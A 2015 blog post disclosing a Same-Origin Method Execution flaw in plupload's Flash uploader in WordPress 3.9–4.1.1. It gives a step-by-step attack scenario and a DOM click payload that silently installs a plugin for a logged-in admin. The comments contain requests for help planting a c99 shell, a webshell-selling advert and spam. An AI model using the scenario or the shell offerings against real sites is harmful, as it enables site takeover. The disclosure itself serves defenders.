środa, 22 kwietnia 2015

plupload - Same-Origin Method Execution [Wordpress 3.9 - 4.1.1]

This January I've found and reported XSS vulnerability in plupload, that affects Wordpress from 3.9 to 4.1.1.  As far as there was no ability to control arguments of function called - the "only" thing we could do with this issue was Same-Origin Method Execution.

Before you start reading technical details - you should update your Wordpress / plupload first.

If you will dig a bit in Flash plupload 2.1.2 source code, you can notice interesting thing in _init() function:


...and _fireEvent()


So we can manipulate with target GET parameter to execute javascript functions, but we can use only alphanumeric characters and dot. Still can be useful, the scenario goes like this:

1. In first tab create new window with target _blank and URL http://hostname/proxy.php
2. Then redirect first tab to http://target-wordpress/wp-admin/plugin-install.php?tab=plugin-information&plugin=google-analytics-dashboard-for-wp&section=description - of course you can use any other plugin install page.
3. The second's tab proxy.php sleeps for few seconds and then redirect to vulnerable plupload on target-wordpress calling this function:


window.opener.document.body.lastChild.previousElementSibling.previousElementSibling.previousElementSibling.lastChild.click()

4. ....aaaand plugin is installed now. ;-)

This one can be of course more automated and faster to install malicious, vulnerable plugins, that after successful exploit will give us webshell or anything we need to own the machine. In my opinion - this can be really dangerous.

PoC: http://ropchain.org/poc/wordpress/

32 komentarze:

  1. Ten komentarz został usunięty przez autora.

    OdpowiedzUsuń
  2. where is the proxy.php script please ?

    OdpowiedzUsuń
    Odpowiedzi
    1. As mentioned - it just sleeps for few seconds and do redirect.



      Simple as that. :)

      Usuń
    2. http://pastebin.com/WuJxSgBH

      Usuń
  3. Ten komentarz został usunięty przez autora.

    OdpowiedzUsuń
  4. Odpowiedzi
    1. Which browser do you use?

      I belive that you're logged in as admin in Wordpress during the test? ;-)

      Usuń
  5. I use FF
    Im not logged :) I thought this was a fail to 'hack' a WP website ...

    OdpowiedzUsuń
  6. Can i get the vulnerable flash file. I am not able to reproduce this.

    OdpowiedzUsuń
    Odpowiedzi
    1. You can find it by downloading archive Wordpress version (like 4.1.1)

      Usuń
    2. i tried on that older versions of wordpress only, but is not working, also i noticed little changes those flash file compared to the snippet given above in your blog. So thought may be the flash file is changed. Can you share your email ID please.

      Usuń
    3. It opens two tabs but the plugin is not getting installed, not sure what am i missing.

      Usuń
    4. DD - try to DM me at twitter or visit http://ropchain.org/ for my e-mail.

      Usuń
  7. How would this look if i wanted to install a shell lets say
    shell c99?
    https://r57.gen.tr/1464020527-c99.html

    OdpowiedzUsuń
  8. https://r57.gen.tr/1464020527-c99.html
    wp-admin/plugin-install.php?tab=plugin-information&plugin=google-analytics-dashboard-for-wp&section=description

    How to make it upload a php shell? thats not listen wordpress plugins website lol?

    OdpowiedzUsuń
  9. Agilestorelocator.com is the professional in wordpress plugin and store locator wordpress. Here is also options available for the plugin is for WordPress.

    OdpowiedzUsuń
  10. Hello, we provide you with variety of webshells which are asp, aspx and php web backdoors, such as b374k, c99, r57, pouya, wso etc. https://webshell.co

    OdpowiedzUsuń
  11. We are providing the services in wordpress to store locator plugin. You can get store locator wordpress through this and also store locator wordpress. We are giving the administrations in wordpress to store locator module. You can get store locator wordpress through this furthermore google store locator.

    OdpowiedzUsuń
  12. A befuddling web diary I visit this blog, it's incredibly grand. Strangely, in this present blog's substance made motivation behind fact and sensible. The substance of information is instructive
    Oracle Fusion Financials Online Training
    Oracle Fusion HCM Online Training
    Oracle Fusion SCM Online Training

    OdpowiedzUsuń
  13. An astounding web diary I visit this blog, it's inconceivably magnificent. Strangely, in this current blog's substance made point of fact and sensible. The substance of information is instructive.
    Oracle Fusion Financials Online Training
    Oracle Fusion HCM Online Training
    Oracle Fusion SCM Online Training

    OdpowiedzUsuń
  14. A befuddling web diary I visit this blog, it's incredibly grand. Strangely, in this present blog's substance made motivation behind fact and sensible. The substance of information is instructive
    Oracle Fusion Financials Online Training
    Oracle Fusion HCM Online Training
    Oracle Fusion SCM Online Training

    OdpowiedzUsuń
  15. A befuddling web diary I visit this blog, it's incredibly grand. Strangely, in this present blog's substance made motivation behind fact and sensible. The substance of information is instructive
    Oracle Fusion Financials Online Training
    Oracle Fusion HCM Online Training
    Oracle Fusion SCM Online Training

    OdpowiedzUsuń
  16. An overwhelming web journal I visit this blog, it's unfathomably amazing. Unusually, in this present blog's substance made inspiration driving truth and reasonable. The substance of data is enlightening
    Oracle Fusion Financials Online Training
    Oracle Fusion HCM Online Training
    Oracle Fusion SCM Online Training

    OdpowiedzUsuń

  17. If you are looking for Call Center jobs in mohali .We are the leader in career and job-search advice. It is free to register on our site and take great benefits of our complete range of services.

    OdpowiedzUsuń
  18. Thanks for provide great informatic and looking beautiful blog, really nice required information & the things i never imagined and i would request, wright more blog and blog post like that for us. Thanks you once agianMarriage certificate in delhi
    Marriage certificate in ghaziabad
    Marriage registration in gurgaon
    Marriage registration in noida
    special marriage act
    Marriage certificate online
    Marriage certificate in mumbai
    Marriage certificate in faridabad
    Marriage certificate in bangalore
    Marriage certificate in hyderabad thanks once again to all.

    OdpowiedzUsuń
  19. Le hair steamer permet de lutter contre la sécheresse, la chute des cheveux et leur mauvaise santé , dans le confort de votre domicile. Le hair steamer est un casque vapeur qui apporte une dose d'hydratation pour les cheveux crépus.
    hair steamer
    Le hair steamer pas cher livraison sur paris.
    Le hair steamer france livraison sur paris.
    La sciatique commence généralement par une hernie discale dans la colonne lombaire
    Le traitement de la sciatique
    soulager la douleur sciatique

    les symptômes de la sciatique
    la sciatique que faire
    veilleuse coranique pas chere

    OdpowiedzUsuń
  20. I love the information you shared. We can learn a lot from this. www.buycubii.com

    OdpowiedzUsuń